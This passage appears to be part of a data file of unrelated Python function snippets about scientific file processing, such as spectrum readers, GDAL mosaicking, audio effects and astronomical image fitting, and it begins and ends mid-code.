file does not yet exist - let's create it first.\n # create rad file and change path to where it will end up in out_dir\n if out_dir is not None:\n (path, filename) = os.path.split(self.rad_file)\n self.rad_file = os.path.join(out_dir, filename)\n else:\n (out_dir, filename) = os.path.split(input_file)\n radiance_cal = RadianceCalibration(self.logfile, self.main_app)\n return radiance_cal.calibrate_to_radiance(InputType.FILE, input_file, out_dir, overwrite_rad)", "def which_band_is_file(filename):\n if not is_galex_file(filename):\n return None\n return \"fuv\" if \"-fd-\" in filename else \"nuv\" if \"-nd-\" in filename \\\n else \"unknown\"", "def outputSingleFrame(self, frame=None):\n if frame is None:\n frame = 1\n\n self.loadFringe(frame=frame)\n\n outputName = self.inputFilenames['ofd'][:-4] + '_single_f' + str(frame) + '.ofd'\n\n with open(outputName, 'wb') as f:\n self.rawBScan.astype('uint16').tofile(f)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def buildvrt(indir, outdir):\n indir = Path(indir)\n outdir = Path(outdir)\n\n # loop over each day directory\n for day in indir.iterdir():\n # expecting 20 subdatasets in each hdf4 file (hopefully the order gdal lists them in is consistent)\n subdataset_fnames = {i: [] for i in range(20)}\n\n # mosaic each MODIS tile for the current day directory\n for h4_fname in day.rglob('*.hdf'):\n with rasterio.open(str(h4_fname.absolute())) as h4_ds:\n\n # each subdataset will form a separate mosaic\n for i, sds_name in enumerate(h4_ds.subdatasets):\n subdataset_fnames[i].append(sds_name)\n\n # loop over each subdataset and mosaic from all supporting MODIS tiles\n for _, file_list in subdataset_fnames.items():\n\n # temp file for the input file list\n with tempfile.NamedTemporaryFile('w') as tmpf:\n tmpf.writelines(\"\\n\".join(file_list))\n tmpf.flush()\n\n # mimic the 'day' directory partition\n base_name = Path(file_list[0].replace(':', '/')).name\n out_fname = outdir.joinpath(day.name, '{}.vrt'.format(base_name))\n\n if not out_fname.parent.exists():\n out_fname.parent.mkdir(parents=True)\n\n # buildvrt\n cmd = [\n 'gdalbuildvrt',\n '-input_file_list',\n tmpf.name,\n str(out_fname)\n ]\n\n check_call(cmd)", "def nirspec_spectrum1d_reader(file_name):\n\n hdulist = fits.open(file_name)\n\n # make wavelength a seperate component in addition to coordinate\n # so you can plot it on the x axis\n wavelength = np.linspace(hdulist['DATA'].header['CRVAL1'],\n hdulist['DATA'].header['CRVAL1']*hdulist['DATA'].header['CDELT1'],\n hdulist['DATA'].header['NAXIS1'])[::-1]\n\n data = Data(label='1D Spectrum')\n data.header = hdulist['DATA'].header\n data.add_component(wavelength, 'Wavelength')\n data.add_component(hdulist['DATA'].data, 'Flux')\n data.add_component(np.sqrt(hdulist['VAR'].data), 'Uncertainty')\n\n return data", "def make_spectra(directory,frame):\n oober = st.short_oober(directory, frame=frame)\n #st.MakeVelocitySpectra(oober,frame)\n #st.MakeAccelSpectra(oober,frame)\n #st.MakeMagneticSpectra(oober,frame)\n st.MakeDensitySpectra(oober,frame)", "def open_raw(path):\r\n raw_file_reader = RawFileReader.RawFileReaderAdapter.FileFactory(path)\r\n 
raw_file_reader.SelectInstrument(Business.Device.UV, 1)\r\n return raw_file_reader", "def make_spec(fi, bw, n, rms, v0, transitions, bandpass, baseline, order,\n Te, ne, Tr, W, dD, EM, cont, Tc, nu, plot, plot_out,\n n_max=1500, verbose=False):\n \n ff = fi + bw\n df = bw/n\n \n # Make the arrays to store the spectrum\n freq = np.arange(fi, ff, df)\n tau = np.zeros(n)\n \n # Create Gaussian noise and add it to the spectrum.\n noise = synth.make_noise(0, rms, n)\n tau_n = tau + noise\n \n # Create a baseline that mimics a standing wave \n # and add it to the spectrum.\n # This values produce a nice variation.\n if bandpass:\n tau_n += synth.make_ripples(4*n, n/2., n, rms)\n \n if baseline:\n tau_n += synth.make_offset(rms, freq, order=order)\n \n z = v0/3e5\n print \"Will use a redshift of: {0}\".format(z)\n print \"Subband edges: {0}--{1}\".format(fi, ff)\n \n for i,trans in enumerate(transitions.split(',')):\n if trans != '':\n n_l, f_l = crrls.find_lines_sb(freq, trans, z, verbose)\n \n # Generate the line properties as a function of n\n dL_r = crrls.radiation_broad_salgado(n_l, W, Tr)/1e6\n dL_p = crrls.pressure_broad_salgado(n_l, Te, ne)/1e6\n dL = dL_r + dL_p\n \n if Tr != 0:\n other = 'case_diffuse_{0}'.format(rrlmod.val2str(Tr))\n else:\n other = ''\n \n n_itau, a_itau = rrlmod.itau(rrlmod.val2str(Te), \n ne, \n trans, n_max=n_max, \n other=other,\n verbose=True)\n \n dD_f = crrls.dv2df(f_l, dD*1e3)\n \n for j,f in enumerate(f_l):\n itau = a_itau[np.where(n_itau==n_l[j])[0]][0]/1e6\n line = crrls.voigt(freq, dD_f[j]/2., dL[j]/2., f, itau*EM)\n if verbose:\n print \"Line properties:\"\n print(\"f: {0}, A: {1}, dD: {2}, dD_f/2: {3}, \" \\\n \"dL/2: {4}\".format(f, itau*EM, dD, dD_f[j]/2., dL[j]/2.))\n tau_n += line\n \n if cont:\n tau_n = (1 + tau_n)*power_law(freq, Tc, nu)\n \n if plot:\n fig = plt.figure(frameon=False)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(freq, tau_n, 'k-', label='generated spectrum')\n ax.plot(freq, power_law(freq, Tc, nu), 'r-', label='continuum')\n plt.legend(loc=0, numpoints=1, frameon=False)\n plt.savefig('{0}'.format(plot_out), \n bbox_inches='tight', pad_inches=0.3)\n plt.close()\n \n \n #np.savetxt(spec, np.c_[freq, tau_n])\n \n return freq, tau_n", "def get_rad_filename(input_file):\n # replace PSV with RAD\n (path, filename) = os.path.split(input_file)\n rad_filename = filename.replace('psv', 'rad')\n rad_filename = rad_filename.replace('PSV', 'RAD')\n rad_file = os.path.join(path, rad_filename)\n\n # rename to .TAB from .TXT in case of raw input\n rad_file = rad_file.replace('.TXT', '.tab')\n rad_file = rad_file.replace('.txt', '.tab')\n\n return rad_file", "def test_simple_single_file():\n\n out_data = run_tvnamer(\n with_files = ['S01E02 - Some File.avi'],\n with_flags = [\"--batch\"])\n\n expected_files = ['S01E02 - Some File.avi']\n\n verify_out_data(out_data, expected_files, expected_returncode = 2)", "def convert_vtt_to_str(file):\n if \".vtt\" in file:\n vtt_to_srt(file)", "def test_RV():\n\n spec = IGRINSSpectrum(file=file)\n\n assert spec.uncertainty is not None\n assert hasattr(spec, \"barycentric_correct\")\n\n correction_velocity = spec.estimate_barycorr()\n\n assert isinstance(spec.RA, astropy.units.quantity.Quantity)\n assert isinstance(spec.DEC, astropy.units.quantity.Quantity)\n assert correction_velocity is not None\n assert isinstance(correction_velocity, astropy.units.quantity.Quantity)\n\n new_spec = spec.barycentric_correct()\n assert new_spec is not None\n assert isinstance(new_spec, Spectrum1D)", "def 
create_training_file(D_RAT):\r\n return create_arff_file(D_RAT, 0)", "def createInput(dirPath,gSettings):\n \n with open(os.path.join('../in','input.txt')) as f:\n inpFile = f.readlines()\n \n\n # Model settings\n model = gSettings[\"Model\"]\n inpFile[13] = \"insgrav: {:1d}\\n\".format(int(model[\"NS gravity\"][\"Flag\"]))\n inpFile[14] = \"isun: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Sun\"]))\n inpFile[15] = \"imoon: {:1d}\\n\".format(int(model[\"Lunisolar\"][\"Moon\"]))\n\n if model[\"Drag\"][\"Flag\"] == False:\n inpFile[16] = \"idrag: 0\\n\"\n else:\n dm = model[\"Drag\"][\"Model\"].lower()\n if dm == \"wertz\":\n idrag = 1\n elif dm == \"us76\":\n idrag = 2\n elif dm == \"j77\":\n idrag = 3\n elif dm == \"msis00\":\n idrag = 4\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Model\"] + '\" invalid.')\n inpFile[16] = \"idrag: {:1d}\\n\".format(idrag)\n if model[\"Drag\"][\"Solar flux\"].lower() == \"constant\":\n inpFile[17] = \"iF107: 0\\n\"\n elif model[\"Drag\"][\"Solar flux\"].lower() == \"variable\":\n inpFile[17] = \"iF107: 1\\n\"\n else:\n raise ValueError('Value \"' + model[\"Drag\"][\"Solar flux\"] + '\" invalid.')\n\n if model[\"SRP\"][\"Flag\"] == False:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n else:\n inpFile[18] = \"iSRP: {:1d}\\n\".format(int(model[\"SRP\"][\"Flag\"]))\n if model[\"SRP\"][\"Eclipses\"]:\n inpFile[18] = \"iSRP: 2\\n\"\n \n if model[\"Lunisolar\"][\"Ephemerides\"] == \"DE431\":\n inpFile[19] = \"iephem: 1\\n\"\n elif model[\"Lunisolar\"][\"Ephemerides\"] == \"Meeus\":\n inpFile[19] = \"iephem: 2\\n\"\n else:\n raise ValueError('Value \"' + model[\"Lunisolar\"][\"Ephemerides\"] + '\" invalid.')\n \n inpFile[20] = \"gdeg: {:3d}\\n\".format(model[\"NS gravity\"][\"Degree\"])\n if model[\"NS gravity\"][\"Order\"] <= model[\"NS gravity\"][\"Degree\"]:\n inpFile[21] = \"gord: {:3d}\\n\".format(model[\"NS gravity\"][\"Order\"])\n else:\n raise ValueError(\"Order {0:d} of the gravity field is greater than degree {1:d}\".format(model[\"NS gravity\"][\"Order\"],model[\"NS gravity\"][\"Degree\"]))\n \n\n\n # Integration settings\n integ = gSettings[\"Integration\"]\n inpFile[29] = \"tol: {:22.15E}\\n\".format(integ[\"Tolerance\"])\n inpFile[30] = \"tspan: {:22.15E}\\n\".format(integ[\"Duration\"] * 365.25)\n inpFile[31] = \"tstep: {:22.15E}\\n\".format(integ[\"Step\"])\n inpFile[39] = \"eqs: {:2d}\\n\".format(integ[\"Equations\"])\n\n\n\n # Output settings\n inpFile[44] = \"verb: 0\\n\"\n inpFile[45] = \"out: \" + os.path.abspath(os.path.join(dirPath, ' '))\n\n\n with open(os.path.join(dirPath,'input.txt'),'w') as f:\n f.writelines(inpFile)", "def get_san(infp, outfp):\n\n return ...", "def deimos_spectrum1D_reader(file_name):\n\n hdulist = fits.open(file_name)\n data = Data(label='1D Spectrum')\n data.header = hdulist[1].header\n\n full_wl = np.append(hdulist[1].data['LAMBDA'][0], hdulist[2].data['LAMBDA'][0])\n full_spec = np.append(hdulist[1].data['SPEC'][0], hdulist[2].data['SPEC'][0])\n full_ivar = np.append(hdulist[1].data['IVAR'][0], hdulist[2].data['IVAR'][0])\n\n data.add_component(full_wl, 'Wavelength')\n data.add_component(full_spec, 'Flux')\n data.add_component(1/np.sqrt(full_ivar), 'Uncertainty')\n\n return data", "def process_rom_file(name):\n\n # Link the instruction rom file to the tb directory\n SRC_FILE = REPO_ROOT + '/tests/riscv-tests-simple/generated/' + name + \".verilog\"\n ROM_FILE = os.getcwd() + '/verilog.rom' # need to link the instruction ram file the the current directory\n if 
os.path.isfile(ROM_FILE):\n os.remove(ROM_FILE)\n os.symlink(SRC_FILE, ROM_FILE)\n\n FP = open('verilog.rom', \"r\")\n IRAM_FP = open('instr_ram.rom', \"w\")\n DRAM_FP = open('data_ram.rom', \"w\")\n\n iram = True\n for line in FP.readlines():\n if line.rstrip() == \"@01000000\":\n iram = False\n continue\n if iram:\n IRAM_FP.write(line)\n else:\n DRAM_FP.write(line)\n\n\n FP.close()\n IRAM_FP.close()\n DRAM_FP.close()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def main():\r\n\r\n ### Choose and Import File\r\n\r\n inSound = Sound()\r\n\r\n rate = inSound.rate\r\n data = inSound.data\r\n dataLength = len(data)\r\n \r\n info = inSound.get_info()\r\n head, filename = os.path.split(info[0]) # get filename of input\r\n \r\n # Decide output directory and filename\r\n outDir = r'out'\r\n outFile = os.path.join(outDir, 'out_'+filename)\r\n\r\n # Check if data has multiple channels, if yes use only one\r\n if(len(data.shape) > 1):\r\n data = data[:,0]\r\n\r\n\r\n ### Set All Parameters\r\n\r\n #get parameters from user dialogue\r\n params = getParameters()\r\n\r\n numChannels = params['numChannels'][0] # number of Channels\r\n loFreq = params['loFreq'][0] # lower bound on frequencies\r\n hiFreq = params['hiFreq'][0] # upper bound on frequencies\r\n plotChannels = params['plotChannels'][0] # if it should plot the Gammatone channels\r\n block_time = params['block_time'][0] # in ms\r\n block_shift = params['block_shift'][0] # in ms\r\n selectChannels = params['selectChannels'][0] # number of channels to activate at a single time\r\n\r\n\r\n ### Filter input file\r\n\r\n filtered, channel_fs = filterDataGamaTone(data, rate, numChannels, loFreq, hiFreq, plotChannels)\r\n\r\n\r\n ### Gammatones -> Stimulation Amplitude for time block\r\n\r\n samples_in_block = np.floor(block_time * rate / 1000).astype('int')\r\n samples_in_shift = np.floor(block_shift * rate / 1000).astype('int')\r\n\r\n summed = gammatoneToAmplitude(filtered, samples_in_block, samples_in_shift)\r\n\r\n # only activate the n electrodes that have the largest stimulation\r\n amps = n_largest_channels(summed, n=selectChannels)\r\n\r\n \r\n #### Sound reconstruction\r\n\r\n # for each timeblock we need to duplicate enough samples to fill it at sample rate\r\n amps_samples = np.repeat(amps, samples_in_shift, axis=1)\r\n #trim end to get same length as input\r\n amps_samples = amps_samples[:,:dataLength] \r\n\r\n # from amplitude samples and frequencies, reconstruct sound\r\n res_data = generateSound(amps_samples, channel_fs, rate)\r\n\r\n\r\n ### Write to output file\r\n write(outFile, rate, res_data)\r\n print('Wrote file to: \\n' + outFile)", "def generateNHDRHeader(self, inputFile):\r\n\r\n logging.info('Processing started')\r\n #initialize PCR object\r\n imagePCRFile = PCRDataObject()\r\n #import image parameters of PCR object\r\n imagePCRFile.ImportFromFile(inputFile)\r\n\r\n filePathName, fileExtension = os.path.splitext(inputFile)\r\n #The directory of the .nhdr file\r\n nhdrPathName = filePathName + \".nhdr\"\r\n\r\n if fileExtension == \".pcr\":\r\n if imagePCRFile.form == 1 or imagePCRFile.form == 5 or imagePCRFile.form == 10:\r\n with open(nhdrPathName, \"w\") as headerFile:\r\n headerFile.write(\"NRRD0004\\n\")\r\n headerFile.write(\"# Complete NRRD file format 
specification at:\\n\")\r\n headerFile.write(\"# http://teem.sourceforge.net/nrrd/format.html\\n\")\r\n if imagePCRFile.form == 5:\r\n headerFile.write(\"type: ushort\\n\")\r\n elif imagePCRFile.form == 10:\r\n headerFile.write(\"type: float\\n\")\r\n elif imagePCRFile.form == 1:\r\n headerFile.write(\"type: uchar\\n\")\r\n headerFile.write(\"dimension: 3\\n\")\r\n headerFile.write(\"space: left-posterior-superior\\n\")\r\n sizeX = imagePCRFile.X\r\n sizeY = imagePCRFile.Y\r\n sizeZ = imagePCRFile.Z\r\n headerFile.write(f\"sizes: {sizeX} {sizeY} {sizeZ}\\n\")\r\n volSpace = imagePCRFile.voxelSize\r\n headerFile.write(f\"space directions: ({volSpace}, 0.0, 0.0) (0.0, {volSpace}, 0.0) (0.0, 0.0, {volSpace})\\n\")\r\n headerFile.write(\"kinds: domain domain domain\\n\")\r\n headerFile.write(\"endian: little\\n\")\r\n headerFile.write(\"encoding: raw\\n\")\r\n headerFile.write(\"space origin: (0.0, 0.0, 0.0)\\n\")\r\n volPathName = filePathName + \".vol\"\r\n volPathSplit = []\r\n volPathSplit = volPathName.split('/')\r\n volFileName = volPathSplit[len(volPathSplit)-1]\r\n headerFile.write(f\"data file: {volFileName}\\n\")\r\n # print(imagePCRFile.form)\r\n print(f\".nhdr file path is: {nhdrPathName}\")\r\n #Automatically loading .vol file using the generated .nhdr file.\r\n if os.path.exists(volPathName):\r\n slicer.util.loadVolume(nhdrPathName)\r\n print(f\"{volFileName} loaded\\n\")\r\n else:\r\n print(f\"{volFileName} is not in the same directory\\n\")\r\n else:\r\n print(\"The format of this dataset is currently not supported by this module. Currently only float (format=10), unsigned 16 bit integer (format=5) and unsigned 8 bit integer (format=1) data types are supported. Please contact us with this dataset to enable this data type.\")\r\n else:\r\n print(\"This is not a PCR file, please re-select a PCR file\")", "def processfile(file, out, me):\n if out.endswith('.npz'):\n out = out[:-4]\n out = out + ('-%03d' % me) + '.npz'\n if os.path.exists(out):\n return\n f = QPM.QPMSubsampleFile(file)\n xis = []\n mybf = QPM.LogWindowBiasFunction(edges[me], edges[me + 1])\n mymock = QPM.halomock(f, 1e6, mybf, continuous=False)\n for i in range(me + 1):\n bf = QPM.LogWindowBiasFunction(edges[i], edges[i + 1])\n mock = QPM.halomock(f, 1e6, bf, continuous=False)\n # the error is nonsense since we have just one sample\n # deal with it in combine\n xi = QPM.xi([mock], mocks2=[mymock])\n r = xi[0]\n xis.append(xi[1])\n print edges[i], edges[i + 1], len(mock[0]), mock[1].sum()\n numpy.savez(out, r=r, xi=xis, edges=edges, N=1e6, me=me)", "def readDriverFile(self, input_file):\n\n\n fid = open(self.basePath + input_file,'r')\n\n # Line 1\n line = fid.readline()\n l_input = line.split('!')\n mshfile = l_input[0].rstrip()\n\n # Line 2\n line = fid.readline()\n l_input = line.split('!')\n obsfile = l_input[0].rstrip()\n\n # Line 3\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='null':\n topofile = []\n\n else:\n topofile = l_input[0].rstrip()\n\n\n # Line 4\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mstart = float(l_input[1])\n\n else:\n mstart = l_input[0].rstrip()\n\n # Line 5\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mref = float(l_input[1])\n\n else:\n mref = l_input[0].rstrip()\n\n # Line 6\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n staticInput = float(l_input[1])\n\n elif l_input[0]=='DEFAULT':\n staticInput = None\n\n else:\n staticInput = 
l_input[0].rstrip()\n\n\n # Line 7\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n magfile = []\n\n else:\n magfile = l_input[0].rstrip()\n\n # Line 8\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n wgtfile = []\n\n else:\n wgtfile = l_input[0].rstrip()\n\n # Line 9\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n chi = float(l_input[0])\n\n # Line 10\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n val = np.array(l_input[0:4])\n alphas = val.astype(np.float)\n\n # Line 11\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n bounds = val.astype(np.float)\n\n else:\n bounds = l_input[0].rstrip()\n\n # Line 12\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:6])\n lpnorms = val.astype(np.float)\n\n else:\n lpnorms = l_input[0].rstrip()\n\n # Line 13\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n eps = val.astype(np.float)\n\n else:\n eps = [None,None]\n\n self.mshfile = mshfile\n self.obsfile = obsfile\n self.topofile = topofile\n self.mstart = mstart\n self._mrefInput = mref\n self._staticInput = staticInput\n self.magfile = magfile\n self.wgtfile = wgtfile\n self.chi = chi\n self.alphas = alphas\n self.bounds = bounds\n self.lpnorms = lpnorms\n self.eps = eps", "def run_vorpastat(self, *options):\n\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpastat\", args)", "def calc_out_voltage(self, input_photocurrent_file):\n pass", "def vt_send(filename, key):\n url = \"https://www.virustotal.com/vtapi/v2/file/scan\"\n attr = {\"apikey\": key}\n files = {\"file\": open(filename, 'rb')}\n res = requests.post(url, data=attr, files=files)\n\n if res.status_code == 200:\n return res.text\n else:\n return res.text", "def __init__(self, input_file_path, convert_to_bgr=False):\n self.__yuv_video = YuvDecoder(input_file_path, convert_to_bgr=True)\n print('After INSTANTIATION')\n self.__yuv_video.start()", "def generate(inputFilename, outputFilename = defaultFileName, \n sizeOfReducedSample = DEFSIZEOFREDUCEDSAMPLE, \n centerEta = DEFCENTERETA, centerPhi = DEFCENTERPHI): \n listOfSignals = convert(inputFilename)\n arrayOfSignals = np.array(listOfSignals)\n arrayOfSignals.shape\n np.save(outputFilename, arrayOfSignals, allow_pickle=False)\n print(\"npy array name: \",outputFilename)", "def get_vrt_band_list():\n logger.debug('get_vrt_band_list() called')\n vrt_band_list = []\n#===============================================================================\n# sensor_dict = self.bands[tile_type_id][(dataset_info['satellite_tag'], dataset_info['sensor_name'])]\n# # log_multiline(logger.debug, sensor, 'Sensor', '\\t')\n# for file_number in sorted(sensor_dict.keys()):\n# band_info = sensor_dict[file_number]\n# if band_info['level_name'] == 'NBAR':\n# dataset_dir = dataset_info['nbar_dataset_path']\n# dataset_id = dataset_info['nbar_dataset_id']\n# processing_level = dataset_info['nbar_level_name']\n# nodata_value = dataset_info['nbar_nodata_value']\n# resampling_method = dataset_info['nbar_resampling_method']\n# elif band_info['level_name'] == 'ORTHO':\n# dataset_dir = dataset_info['l1t_dataset_path']\n# dataset_id = dataset_info['l1t_dataset_id']\n# processing_level = dataset_info['l1t_level_name']\n# nodata_value = dataset_info['l1t_nodata_value']\n# resampling_method = 
dataset_info['l1t_resampling_method']\n# else:\n# continue # Ignore any pan-chromatic and derived bands\n# \n# dataset_dir = os.path.join(dataset_dir, 'scene01')\n# filename = find_file(dataset_dir, band_info['file_pattern'])\n# vrt_band_list.append({'file_number': band_info['file_number'], \n# 'filename': filename, \n# 'name': band_info['band_name'],\n# 'dataset_id': dataset_id,\n# 'band_id': band_info['band_id'],\n# 'processing_level': processing_level,\n# 'nodata_value': nodata_value,\n# 'resampling_method': resampling_method,\n# 'tile_layer': band_info['tile_layer']})\n#===============================================================================\n \n #TODO: Make this able to handle multiple derived layers\n for band_level in ['FC']:\n derived_bands = self.bands[tile_type_id][('DERIVED', band_level)]\n for file_number in sorted(derived_bands.keys()):\n band_info = derived_bands[file_number]\n file_pattern = band_info['file_pattern']\n dataset_dir = os.path.join(dataset_info['fc_dataset_path'], 'scene01')\n dataset_id = dataset_info['fc_dataset_id']\n filename = find_file(dataset_dir, file_pattern) \n processing_level = dataset_info['fc_level_name']\n nodata_value = dataset_info['fc_nodata_value'] # Should be None for FC\n resampling_method = dataset_info['fc_resampling_method']\n vrt_band_list.append({'file_number': None, \n 'filename': filename, \n 'name': band_info['band_name'],\n 'dataset_id': dataset_id,\n 'band_id': band_info['band_id'],\n 'processing_level': processing_level,\n 'nodata_value': nodata_value,\n 'resampling_method': resampling_method,\n 'tile_layer': 1})\n \n log_multiline(logger.debug, vrt_band_list, 'vrt_band_list = %s', '\\t')\n return vrt_band_list", "def verb(filename,l,t,d,wout=True): #l = predelay d= decay smaller = less decay, t= number of delays\n#low l turns into chorus\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n data_ex=np.zeros(((n+l*t),ch))\n data_ex[0:n,:]=data\n data_Rex=np.zeros((len(data_ex),t,ch))\n print('Applying reverb...')\n for k in range (ch):\n for i in range (len(data)):\n for j in range(t):\n data_Rex[i+l*(j+1),j,k]=data_ex[i,k]*np.exp(-d*(j+1))\n data_F=data_ex\n print('Mixing...')\n for i in range (t):\n data_F=data_F+1*data_Rex[:,i,:]\n data_F=1*data_F\n data_verb=data_F+data_ex\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_verbed.wav',data_verb,sr,'PCM_16')\n print('Done!')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.')\n return data_verb", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def forwardModel(file, out='Data', wavelength=None, gain=3.1, size=10, burn=500, spotx=2888, spoty=3514, run=700,\n simulation=False, truths=None, blurred=False):\n print '\\n\\n\\n'\n print '_'*120\n print 'Processing:', file\n #get data and convert to electrons\n o = pf.getdata(file)*gain\n\n if simulation:\n data = o\n else:\n #roughly the correct location - to avoid identifying 
e.g. cosmic rays\n data = o[spoty-(size*3):spoty+(size*3)+1, spotx-(size*3):spotx+(size*3)+1].copy()\n\n #maximum position within the cutout\n y, x = m.maximum_position(data)\n\n #spot and the peak pixel within the spot, this is also the CCD kernel position\n spot = data[y-size:y+size+1, x-size:x+size+1].copy()\n CCDy, CCDx = m.maximum_position(spot)\n print 'CCD Kernel Position (within the postage stamp):', CCDx, CCDy\n\n #bias estimate\n if simulation:\n bias = 9000.\n rn = 4.5\n else:\n bias = np.median(o[spoty-size: spoty+size, spotx-220:spotx-20]) #works for read o\n rn = np.std(o[spoty-size: spoty+size, spotx-220:spotx-20])\n\n print 'Readnoise (e):', rn\n if rn < 2. or rn > 6.:\n print 'NOTE: suspicious readout noise estimate...'\n print 'ADC offset (e):', bias\n\n #remove bias\n spot -= bias\n\n #save to file\n fileIO.writeFITS(spot, out+'small.fits', int=False)\n\n #make a copy ot generate error array\n data = spot.copy().flatten()\n #assume that uncertanties scale as sqrt of the values + readnoise\n #sigma = np.sqrt(data/gain + rn**2)\n tmp = data.copy()\n tmp[tmp + rn**2 < 0.] = 0. #set highly negative values to zero\n var = tmp.copy() + rn**2\n #Gary B. said that actually this should be from the model or is biased,\n #so I only pass the readout noise part now\n\n #fit a simple model\n print 'Least Squares Fitting...'\n gaus = models.Gaussian2D(spot.max(), size, size, x_stddev=0.5, y_stddev=0.5)\n gaus.theta.fixed = True #fix angle\n p_init = gaus\n fit_p = fitting.LevMarLSQFitter()\n stopy, stopx = spot.shape\n X, Y = np.meshgrid(np.arange(0, stopx, 1), np.arange(0, stopy, 1))\n p = fit_p(p_init, X, Y, spot)\n print p\n model = p(X, Y)\n fileIO.writeFITS(model, out+'BasicModel.fits', int=False)\n fileIO.writeFITS(model - spot, out+'BasicModelResidual.fits', int=False)\n\n #goodness of fit\n gof = (1./(np.size(data) - 5.)) * np.sum((model.flatten() - data)**2 / var)\n print 'GoF:', gof\n print 'Done\\n\\n'\n\n #maximum value\n max = np.max(spot)\n peakrange = (0.9*max, 1.7*max)\n sum = np.sum(spot)\n\n print 'Maximum Value:', max\n print 'Sum of the values:', sum\n print 'Peak Range:', peakrange\n\n #MCMC based fitting\n print 'Bayesian Model Fitting...'\n nwalkers = 1000\n\n # Initialize the sampler with the chosen specs.\n #Create the coordinates x and y\n x = np.arange(0, spot.shape[1])\n y = np.arange(0, spot.shape[0])\n #Put the coordinates in a mesh\n xx, yy = np.meshgrid(x, y)\n\n #Flatten the arrays\n xx = xx.flatten()\n yy = yy.flatten()\n\n print 'Fitting full model...'\n ndim = 7\n\n #Choose an initial set of positions for the walkers - fairly large area not to bias the results\n p0 = np.zeros((nwalkers, ndim))\n #peak, center_x, center_y, radius, focus, width_x, width_y = theta\n p0[:, 0] = np.random.normal(max, max/100., size=nwalkers) # peak value\n p0[:, 1] = np.random.normal(p.x_mean.value, 0.1, size=nwalkers) # x\n p0[:, 2] = np.random.normal(p.y_mean.value, 0.1, size=nwalkers) # y\n\n if wavelength is None:\n if blurred:\n print 'Using initial guess [radius, focus, width_x, width_y]:', [0.5, 1., 0.3, 0.3]\n p0[:, 3] = np.random.normal(0.5, 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(1., 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(0.3, 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(0.3, 0.01, size=nwalkers) # width_y\n else:\n p0[:, 3] = np.random.uniform(.45, 0.55, size=nwalkers) # radius\n p0[:, 4] = np.random.uniform(.40, 0.45, size=nwalkers) # focus\n p0[:, 5] = np.random.uniform(.35, 0.45, size=nwalkers) # 
width_x\n p0[:, 6] = np.random.uniform(.35, 0.45, size=nwalkers) # width_y\n else:\n tmp = _expectedValues()[wavelength]\n if blurred:\n print 'Using initial guess [radius, focus, width_x, width_y]:', [tmp[0], 0.9, tmp[2], tmp[3]]\n p0[:, 3] = np.random.normal(tmp[0], 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(0.9, 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(tmp[2], 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(tmp[3], 0.01, size=nwalkers) # width_y\n else:\n print 'Using initial guess [radius, focus, width_x, width_y]:', tmp\n p0[:, 3] = np.random.normal(tmp[0], 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(tmp[1], 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(tmp[2], 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(tmp[3], 0.01, size=nwalkers) # width_y\n\n #initiate sampler\n pool = Pool(cores) #A hack Dan gave me to not have ghost processes running as with threads keyword\n #sampler = emcee.EnsembleSampler(nwalkers, ndim, log_posterior, args=[xx, yy, data, var, peakrange, spot.shape],\n sampler = 